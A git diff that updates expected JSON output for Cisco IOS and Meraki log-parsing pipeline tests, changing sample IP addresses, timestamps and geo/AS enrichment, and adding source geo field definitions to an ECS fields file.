1, - "address": "198.51.100.197", - "ip": "198.51.100.197" + "address": "192.168.100.197", + "ip": "192.168.100.197" }, - "message": "list 177 denied igmp 198.51.100.197 -\u003e 224.0.0.22, 1 packet", + "message": "list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Rt5RGlrNED3cg8Wokm4+KGsDz+4=", + "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", "transport": "igmp", "type": "ipv4", "packets": 1 @@ -31,15 +31,15 @@ }, "related": { "ip": [ - "198.51.100.197", + "192.168.100.197", "224.0.0.22" ] }, "event": { "severity": 6, "sequence": 585917, - "ingested": "2021-07-19T09:06:56.360370014Z", - "original": "Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -\u003e 224.0.0.22, 1 packet", + "ingested": "2021-12-09T13:33:17.492482Z", + "original": "Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", "code": "IPACCESSLOGRP", "provider": "firewall", "action": "deny", @@ -57,7 +57,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -66,15 +66,15 @@ }, "source": { "packets": 1, - "address": "198.51.100.2", - "ip": "198.51.100.2" + "address": "192.168.100.2", + "ip": "192.168.100.2" }, - "message": "list INBOUND-ON-F11 denied igmp 198.51.100.2 -\u003e 224.0.0.2 (20), 1 packet", + "message": "list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:gg8i3117u+0XZ7S0E0dl04HE4qw=", + "community_id": "1:eM790E01lXKYULfDPBPP0umazRw=", "transport": "igmp", "type": "ipv4", "packets": 1 @@ -87,15 +87,15 @@ }, "related": { "ip": [ - "198.51.100.2", + "192.168.100.2", "224.0.0.2" ] }, "event": { "severity": 6, "sequence": 585918, - "ingested": "2021-07-19T09:06:56.360375335Z", - "original": "Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -\u003e 224.0.0.2 (20), 1 packet", + "ingested": "2021-12-09T13:33:17.492489100Z", + "original": "Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet", "code": "IPACCESSLOGSP", "provider": "firewall", "action": "deny", @@ -113,7 +113,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -122,10 +122,10 @@ }, "source": { "packets": 1, - "address": "198.51.100.1", - "ip": "198.51.100.1" + "address": "192.168.100.1", + "ip": "192.168.100.1" }, - "message": "list 171 denied 0 198.51.100.1 -\u003e 255.255.255.255, 1 packet", + "message": "list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", "tags": [ "preserve_original_event" ], @@ -139,15 +139,15 @@ }, "related": { "ip": [ - "198.51.100.1", + "192.168.100.1", "255.255.255.255" ] }, "event": { "severity": 6, "sequence": 585919, - "ingested": "2021-07-19T09:06:56.360377543Z", - "original": "Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -\u003e 255.255.255.255, 1 packet", + "ingested": "2021-12-09T13:33:17.492495400Z", + "original": "Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", "code": "IPACCESSLOGNP", "provider": "firewall", "action": "deny", @@ -165,26 +165,56 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 22, - "address": "2001:DB8:1000::1", - "ip": "2001:DB8:1000::1" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { - "address": "2001:DB8::3", + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 1027, "packets": 9, - "ip": "2001:DB8::3" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, - "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -\u003e 2001:DB8:1000::1(22), 9 packets", + "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:MFLZEQR2gBCpxJEXRvaB0jjkxNA=", + "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=", "transport": "tcp", "type": "ipv6", "packets": 9 @@ -194,15 +224,14 @@ }, "related": { "ip": [ - "2001:DB8::3", - "2001:DB8:1000::1" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { "severity": 6, "sequence": 585920, - "ingested": "2021-07-19T09:06:56.360379550Z", - "original": "May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -\u003e 2001:DB8:1000::1(22), 9 packets", + "ingested": "2021-12-09T13:33:17.492501Z", + "original": "May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", "code": "ACCESSLOGP", "provider": "firewall", "action": "allow", @@ -220,26 +249,26 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "port": 15600, - "address": "198.51.100.255", - "ip": "198.51.100.255" + "address": "192.168.100.255", + "ip": "192.168.100.255" }, "source": { - "address": "198.51.100.195", + "address": "192.168.100.195", "port": 55250, "packets": 1, - "ip": "198.51.100.195" + "ip": "192.168.100.195" }, - "message": "list 177 denied udp 198.51.100.195(55250) -\u003e 198.51.100.255(15600), 1 packet", + "message": "list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:7qvTEOLkmhTrK1y9mKNwCENQbeU=", + "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", "transport": "udp", "type": "ipv4", "packets": 1 @@ -249,15 +278,15 @@ }, "related": { "ip": [ - "198.51.100.195", - "198.51.100.255" + "192.168.100.195", + "192.168.100.255" ] }, "event": { "severity": 6, "sequence": 1663303, - "ingested": "2021-07-19T09:06:56.360381464Z", - "original": "Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -\u003e 198.51.100.255(15600), 1 packet", + "ingested": "2021-12-09T13:33:17.492506500Z", + "original": "Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -275,19 +304,19 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { - "address": "198.51.100.2", - "ip": "198.51.100.2" + "address": "192.168.100.2", + "ip": "192.168.100.2" }, "source": { "packets": 1, - "address": "198.51.100.1", - "ip": "198.51.100.1" + "address": "192.168.100.1", + "ip": "192.168.100.1" }, - "message": "list 151 denied icmp 198.51.100.1 -\u003e 198.51.100.2 (3/4), 1 packet", + "message": "list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet", "icmp": { "type": "3", "code": "4" @@ -296,7 +325,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9lO0Kj0TpXAVNWuiPRAyFAGtCqM=", + "community_id": "1:qFmXhpjtK+/aneNSpMgRiI7dwi4=", "transport": "icmp", "type": "ipv4", "packets": 1 @@ -306,15 +335,15 @@ }, "related": { "ip": [ - "198.51.100.1", - "198.51.100.2" + "192.168.100.1", + "192.168.100.2" ] }, "event": { "severity": 6, "sequence": 1663304, - "ingested": "2021-07-19T09:06:56.360387855Z", - "original": "Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -\u003e 198.51.100.2 (3/4), 1 packet", + "ingested": "2021-12-09T13:33:17.492511400Z", + "original": "Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet", "code": "IPACCESSLOGDP", "provider": "firewall", "action": "deny", @@ -332,26 +361,26 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "port": 15600, - "address": "198.51.100.255", - "ip": "198.51.100.255" + "address": "192.168.100.255", + "ip": "192.168.100.255" }, "source": { - "address": "198.51.100.195", + "address": "192.168.100.195", "port": 54309, "packets": 1, - "ip": "198.51.100.195" + "ip": "192.168.100.195" }, - "message": "list 177 denied udp 198.51.100.195(54309) -\u003e 198.51.100.255(15600), 1 packet", + "message": "list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:UaC2rOjKSQBEmX+jEyiQatg9eGI=", + "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", "transport": "udp", "type": "ipv4", "packets": 1 @@ -361,15 +390,15 @@ }, "related": { "ip": [ - "198.51.100.195", - "198.51.100.255" + "192.168.100.195", + "192.168.100.255" ] }, "event": { "severity": 6, "sequence": 1663312, - "ingested": "2021-07-19T09:06:56.360389813Z", - "original": "Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -\u003e 198.51.100.255(15600), 1 packet", + "ingested": "2021-12-09T13:33:17.492514700Z", + "original": "Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -390,14 +419,14 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 6, "sequence": 1663313, - "ingested": "2021-07-19T09:06:56.360391731Z", - "original": "Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets", + "ingested": "2021-12-09T13:33:17.492519Z", + "original": "Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets", "code": "IPACCESSLOGRL", "provider": "firewall", "category": "network", @@ -417,26 +446,26 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "port": 15600, - "address": "198.51.100.255", - "ip": "198.51.100.255" + "address": "192.168.100.255", + "ip": "192.168.100.255" }, "source": { - "address": "198.51.100.195", + "address": "192.168.100.195", "port": 43989, "packets": 1, - "ip": "198.51.100.195" + "ip": "192.168.100.195" }, - "message": "list 177 denied udp 198.51.100.195(43989) -\u003e 198.51.100.255(15600), 1 packet", + "message": "list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:CdrzBOQ6Cohqy+Mgg9EZnl1nHFs=", + "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", "transport": "udp", "type": "ipv4", "packets": 1 @@ -446,15 +475,15 @@ }, "related": { "ip": [ - "198.51.100.195", - "198.51.100.255" + "192.168.100.195", + "192.168.100.255" ] }, "event": { "severity": 6, "sequence": 1663314, - "ingested": "2021-07-19T09:06:56.360393643Z", - "original": "Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -\u003e 198.51.100.255(15600), 1 packet", + "ingested": "2021-12-09T13:33:17.492524100Z", + "original": "Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -472,41 +501,44 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "172.217.10.46", + "address": "81.2.69.144", "port": 80, - "ip": "172.217.10.46" + "ip": "81.2.69.144" }, "source": { - "address": "198.51.100.12", + "address": "192.168.100.12", "port": 59832, "packets": 1, - "ip": "198.51.100.12" + "ip": "192.168.100.12" }, - "message": "list 150 denied tcp 198.51.100.12(59832) -\u003e 172.217.10.46(80), 1 packet", + "message": "list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VrawQ+fBZ7zfHStQfvTOW1zQANA=", + "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", "transport": "tcp", "type": "ipv4", "packets": 1 @@ -516,15 +548,15 @@ }, "related": { "ip": [ - "198.51.100.12", - "172.217.10.46" + "192.168.100.12", + "81.2.69.144" ] }, "event": { "severity": 6, "sequence": 1663321, - "ingested": "2021-07-19T09:06:56.360395532Z", - "original": "Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -\u003e 172.217.10.46(80), 1 packet", + "ingested": "2021-12-09T13:33:17.492528800Z", + "original": "Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -545,14 +577,14 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 6, "sequence": 1663325, - "ingested": "2021-07-19T09:06:56.360397394Z", - "original": "Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets", + "ingested": "2021-12-09T13:33:17.492532600Z", + "original": "Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets", "code": "IPACCESSLOGRL", "provider": "firewall", "category": "network", @@ -572,19 +604,19 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { - "address": "198.51.100.1", - "ip": "198.51.100.1" + "address": "192.168.100.1", + "ip": "192.168.100.1" }, "source": { "packets": 32, - "address": "198.51.100.12", - "ip": "198.51.100.12" + "address": "192.168.100.12", + "ip": "192.168.100.12" }, - "message": "list 150 denied icmp 198.51.100.12 -\u003e 198.51.100.1 (3/3), 32 packets", + "message": "list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets", "icmp": { "type": "3", "code": "3" @@ -593,7 +625,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:huj4hjTG/rbN+R5GhpV6YHP1sYM=", + "community_id": "1:iJX04o1L7tLCbqhG80H5P/Nx4FY=", "transport": "icmp", "type": "ipv4", "packets": 32 @@ -603,15 +635,15 @@ }, "related": { "ip": [ - "198.51.100.12", - "198.51.100.1" + "192.168.100.12", + "192.168.100.1" ] }, "event": { "severity": 6, "sequence": 1663326, - "ingested": "2021-07-19T09:06:56.360399550Z", - "original": "Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -\u003e 198.51.100.1 (3/3), 32 packets", + "ingested": "2021-12-09T13:33:17.492537400Z", + "original": "Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets", "code": "IPACCESSLOGDP", "provider": "firewall", "action": "deny", @@ -629,41 +661,44 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "172.217.10.46", + "address": "81.2.69.144", "port": 80, - "ip": "172.217.10.46" + "ip": "81.2.69.144" }, "source": { - "address": "198.51.100.12", + "address": "192.168.100.12", "port": 59834, "packets": 1, - "ip": "198.51.100.12" + "ip": "192.168.100.12" }, - "message": "list 150 denied tcp 198.51.100.12(59834) -\u003e 172.217.10.46(80), 1 packet", + "message": "list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5enMmUgQViWG28IC5W6/9cYJ6EA=", + "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", "transport": "tcp", "type": "ipv4", "packets": 1 @@ -673,15 +708,15 @@ }, "related": { "ip": [ - "198.51.100.12", - "172.217.10.46" + "192.168.100.12", + "81.2.69.144" ] }, "event": { "severity": 6, "sequence": 1663327, - "ingested": "2021-07-19T09:06:56.360401431Z", - "original": "Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -\u003e 172.217.10.46(80), 1 packet", + "ingested": "2021-12-09T13:33:17.492542900Z", + "original": "Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -699,7 +734,7 @@ "log": { "level": "notification", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -733,8 +768,8 @@ "event": { "severity": 5, "sequence": 1991219, - "ingested": "2021-07-19T09:06:56.360403294Z", - "original": "Mar 24 18:06:03 198.51.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", + "ingested": "2021-12-09T13:33:17.492547Z", + "original": "Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", "code": "LOGIN_SUCCESS", "provider": "firewall", "category": "network", @@ -762,7 +797,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "source": { @@ -776,8 +811,8 @@ "event": { "severity": 6, "sequence": 1991220, - "ingested": "2021-07-19T09:06:56.360405194Z", - "original": "Mar 24 18:06:00 198.51.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)", + "ingested": "2021-12-09T13:33:17.492551Z", + "original": "Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)", "code": "LOGOUT", "provider": "firewall", "category": "network", @@ -804,7 +839,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -835,8 +870,8 @@ "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-07-19T09:06:56.360407101Z", - "original": "Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", + "ingested": "2021-12-09T13:33:17.492554300Z", + "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", "action": "multicast-join", @@ -861,7 +896,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -892,8 +927,8 @@ "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-07-19T09:06:56.360409151Z", - "original": "Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", + "ingested": "2021-12-09T13:33:17.492559100Z", + "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", "action": "multicast-join", @@ -924,14 +959,14 @@ "log": { "level": "warning", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 4, "sequence": 1991217, - "ingested": "2021-07-19T09:06:56.360411008Z", - "original": "Mar 24 12:09:35 198.51.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0", + "ingested": "2021-12-09T13:33:17.492564400Z", + "original": "Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0", "code": "NOVALIDKEY", "provider": "firewall", "category": "network", @@ -954,14 +989,14 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 6, "sequence": 1991218, - "ingested": "2021-07-19T09:06:56.360413029Z", - "original": "Mar 24 12:06:47 198.51.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19", + "ingested": "2021-12-09T13:33:17.492569200Z", + "original": "Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19", "code": "CALL_PRESERVED", "provider": "firewall", "category": "network", diff --git a/packages/cisco/data_stream/ios/fields/ecs.yml b/packages/cisco/data_stream/ios/fields/ecs.yml index 0439aa8651e..f1b640bd5ec 100644 --- a/packages/cisco/data_stream/ios/fields/ecs.yml +++ b/packages/cisco/data_stream/ios/fields/ecs.yml @@ -12,6 +12,12 @@ name: destination.geo.country_iso_code - external: ecs name: destination.geo.country_name +- external: ecs + name: destination.geo.city_name +- external: ecs + name: destination.geo.region_iso_code +- external: ecs + name: destination.geo.region_name - description: Longitude and latitude. level: core name: destination.geo.location @@ -82,5 +88,27 @@ name: source.port - external: ecs name: source.user.name +- external: ecs + name: source.address +- external: ecs + name: source.as.number +- external: ecs + name: source.as.organization.name +- external: ecs + name: source.geo.continent_name +- external: ecs + name: source.geo.country_iso_code +- external: ecs + name: source.geo.country_name +- external: ecs + name: source.geo.city_name +- external: ecs + name: source.geo.region_iso_code +- external: ecs + name: source.geo.region_name +- description: Longitude and latitude. + level: core + name: source.geo.location + type: geo_point - external: ecs name: tags diff --git a/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json b/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json index 3e7fc8e3de5..8659ea62b8f 100644 --- a/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json @@ -6,7 +6,7 @@ }, "message": "modtempo 1454047799.olab nto_ security_event olaborissecurity_event tur url=https://example.org/odoco/ria.jpg?ritin=uredolor#tatemac src=10.15.44.253:5078 dst=10.193.124.51:5293 mac=01:00:5e:28:ae:7d name=psa sha256=umq disposition=ntium action=deny", "event": { - "ingested": "2021-07-19T09:06:57.318322723Z" + "ingested": "2021-12-09T13:33:18.888379800Z" }, "tags": [ "preserve_original_event" @@ -18,7 +18,7 @@ }, "message": "umdo 1455282753.itessequ vol_ events dhcp lease of ip 10.102.218.31 from server mac 01:00:5e:9c:c2:9c for client mac 01:00:5e:0f:87:e3 from router 10.15.16.212 on subnet ameaqu with dns aqu", "event": { - "ingested": "2021-07-19T09:06:57.318328522Z" + "ingested": "2021-12-09T13:33:18.888383Z" }, "tags": [ "preserve_original_event" @@ -30,7 +30,7 @@ }, "message": "uipexea 1456517708.tatio minim_ flows ceroinBC flows src=10.179.60.216 dst=10.69.53.104 protocol=udp pattern: 0 reprehe", "event": { - "ingested": "2021-07-19T09:06:57.318330876Z" + "ingested": "2021-12-09T13:33:18.888388400Z" }, "tags": [ "preserve_original_event" @@ -42,7 +42,7 @@ }, "message": "mipsu 1457752662.consec taliquip_ flows radip flows block src=10.155.236.240 dst=10.112.46.169 mac=01:00:5e:7a:74:89 protocol=ipv6 type=roidents ", "event": { - "ingested": "2021-07-19T09:06:57.318332842Z" + "ingested": "2021-12-09T13:33:18.888393Z" }, "tags": [ "preserve_original_event" @@ -54,7 +54,7 @@ }, "message": "obeataev 1458987616.lor uidexea_appliance events MAC 01:00:5e:e1:89:ac and MAC 01:00:5e:a3:d9:ac both claim IP: 10.14.107.140", "event": { - "ingested": "2021-07-19T09:06:57.318334770Z" + "ingested": "2021-12-09T13:33:18.888397400Z" }, "tags": [ "preserve_original_event" @@ -66,7 +66,7 @@ }, "message": "iutal 1460222571.dexe urerep events content_filtering_block url='https://api.example.org/liqu/lorem.gif?ueipsaqu=uidolore#niamqu' category0='ari' server='10.108.180.105:5098' client_mac='01:00:5e:40:9b:83'", "event": { - "ingested": "2021-07-19T09:06:57.318336673Z" + "ingested": "2021-12-09T13:33:18.888402700Z" }, "tags": [ "preserve_original_event" @@ -78,7 +78,7 @@ }, "message": "ipit 1461457525.idexea riat_appliance events MAC 01:00:5e:25:4f:e4 and MAC 01:00:5e:3f:49:e4 both claim IP: 10.149.88.198", "event": { - "ingested": "2021-07-19T09:06:57.318338594Z" + "ingested": "2021-12-09T13:33:18.888407900Z" }, "tags": [ "preserve_original_event" @@ -90,7 +90,7 @@ }, "message": "ntsuntin 1462692479.aecatcup animi events dhcp release for mac 01:00:5e:e3:10:34", "event": { - "ingested": "2021-07-19T09:06:57.318340690Z" + "ingested": "2021-12-09T13:33:18.888413100Z" }, "tags": [ "preserve_original_event" @@ -102,7 +102,7 @@ }, "message": "orsitame 1463927433.quiratio ite events MAC 01:00:5e:48:62:22 and MAC 01:00:5e:9f:b6:a6 both claim IP: 10.243.206.225", "event": { - "ingested": "2021-07-19T09:06:57.318342807Z" + "ingested": "2021-12-09T13:33:18.888418300Z" }, "tags": [ "preserve_original_event" @@ -114,7 +114,7 @@ }, "message": "olupta turveli.toccae tatno_ ids-alerts taliqu ids-alerts signature=temUten priority=ccusan timestamp=1465162388.iqudirection=outbound protocol=icmp src=10.131.82.116:7307", "event": { - "ingested": "2021-07-19T09:06:57.318344851Z" + "ingested": "2021-12-09T13:33:18.888423400Z" }, "tags": [ "preserve_original_event" @@ -126,7 +126,7 @@ }, "message": "uaera 1466397342.sitas ehenderi_ security_event atquovosecurity_event iumto url=https://www5.example.net/sun/essecill.html?saute=vel#quu src=10.210.213.18:7616 dst=10.134.0.141:2703 